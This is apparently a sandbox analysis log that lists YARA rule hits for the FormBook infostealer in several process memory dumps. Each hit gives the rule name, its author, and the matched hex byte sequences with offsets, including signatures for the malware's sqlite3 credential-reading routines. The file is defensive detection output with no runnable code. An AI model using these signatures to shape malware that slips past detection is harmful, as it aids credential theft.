0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9628:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x98a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x153d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ec1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x154d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1564f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa2ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1413c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xafb3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b627:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c62a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18549:$sqlite3step: 68 34 1C 7B E1 0x1865c:$sqlite3step: 68 34 1C 7B E1 0x18578:$sqlite3text: 68 38 2A 90 C5 0x1869d:$sqlite3text: 68 38 2A 90 C5 0x1858b:$sqlite3blob: 68 53 D8 7F 8C 0x186b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd8c11:$a1: 3C 30 50 4F 53 54 74 09 40 0xf8c31:$a1: 3C 30 50 4F 53 54 74 09 40 0xef560:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x10f580:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xdd38f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xfd3af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xe8277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x108297:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xdc2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdc542:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc2e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc562:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe8075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x108095:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe7b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x107b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe8177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x108197:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe82ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10830f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xdcf5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xfcf7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xe6ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x106dfc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xddc53:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xfdc73:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xee2c7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10e2e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xef2ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xeb1e9:$sqlite3step: 68 34 1C 7B E1 0xeb2fc:$sqlite3step: 68 34 1C 7B E1 0x10b209:$sqlite3step: 68 34 1C 7B E1 0x10b31c:$sqlite3step: 68 34 1C 7B E1 0xeb218:$sqlite3text: 68 38 2A 90 C5 0xeb33d:$sqlite3text: 68 38 2A 90 C5 0x10b238:$sqlite3text: 68 38 2A 90 C5 0x10b35d:$sqlite3text: 68 38 2A 90 C5 0xeb22b:$sqlite3blob: 68 53 D8 7F 8C 0xeb353:$sqlite3blob: 68 53 D8 7F 8C 0x10b24b:$sqlite3blob: 68 53 D8 7F 8C 0x10b373:$sqlite3blob: 68 53 D8 7F 8C
00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x56a1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14d07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8d58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14b05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x145f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14c07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14d7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1386c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa6e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ad57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bd5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17c79:$sqlite3step: 68 34 1C 7B E1 0x17d8c:$sqlite3step: 68 34 1C 7B E1 0x17ca8:$sqlite3text: 68 38 2A 90 C5 0x17dcd:$sqlite3text: 68 38 2A 90 C5 0x17cbb:$sqlite3blob: 68 53 D8 7F 8C 0x17de3:$sqlite3blob: 68 53 D8 7F 8C
0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5e31:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa5af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15497:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x94e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15295:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14d81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15397:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1550f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa17a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13ffc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xae73:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5d39:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c688:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa4b7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1539f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x93f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x966a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1519d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14c89:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1529f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15417:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa082:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13f04:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xad7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b3ef:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c3f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18311:$sqlite3step: 68 34 1C 7B E1 0x18424:$sqlite3step: 68 34 1C 7B E1 0x18340:$sqlite3text: 68 38 2A 90 C5 0x18465:$sqlite3text: 68 38 2A 90 C5 0x18353:$sqlite3blob: 68 53 D8 7F 8C 0x1847b:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6c51:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d5a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb3cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x162b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa308:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa582:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x160b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x161b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1632f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaf9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14e1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbc93:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c307:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19229:$sqlite3step: 68 34 1C 7B E1 0x1933c:$sqlite3step: 68 34 1C 7B E1 0x19258:$sqlite3text: 68 38 2A 90 C5 0x1937d:$sqlite3text: 68 38 2A 90 C5 0x1926b:$sqlite3blob: 68 53 D8 7F 8C 0x19393:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x60b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ca00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa82f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15717:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9768:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x99e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15515:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15001:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15617:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1578f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa3fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1427c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb0f3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b767:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c76a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18689:$sqlite3step: 68 34 1C 7B E1 0x1879c:$sqlite3step: 68 34 1C 7B E1 0x186b8:$sqlite3text: 68 38 2A 90 C5 0x187dd:$sqlite3text: 68 38 2A 90 C5 0x186cb:$sqlite3blob: 68 53 D8 7F 8C 0x187f3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18829:$sqlite3step: 68 34 1C 7B E1 0x1893c:$sqlite3step: 68 34 1C 7B E1 0x18858:$sqlite3text: 68 38 2A 90 C5 0x1897d:$sqlite3text: 68 38 2A 90 C5 0x1886b:$sqlite3blob: 68 53 D8 7F 8C 0x18993:$sqlite3blob: 68 53 D8 7F 8C
00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5b91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c4e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa30f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x151f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
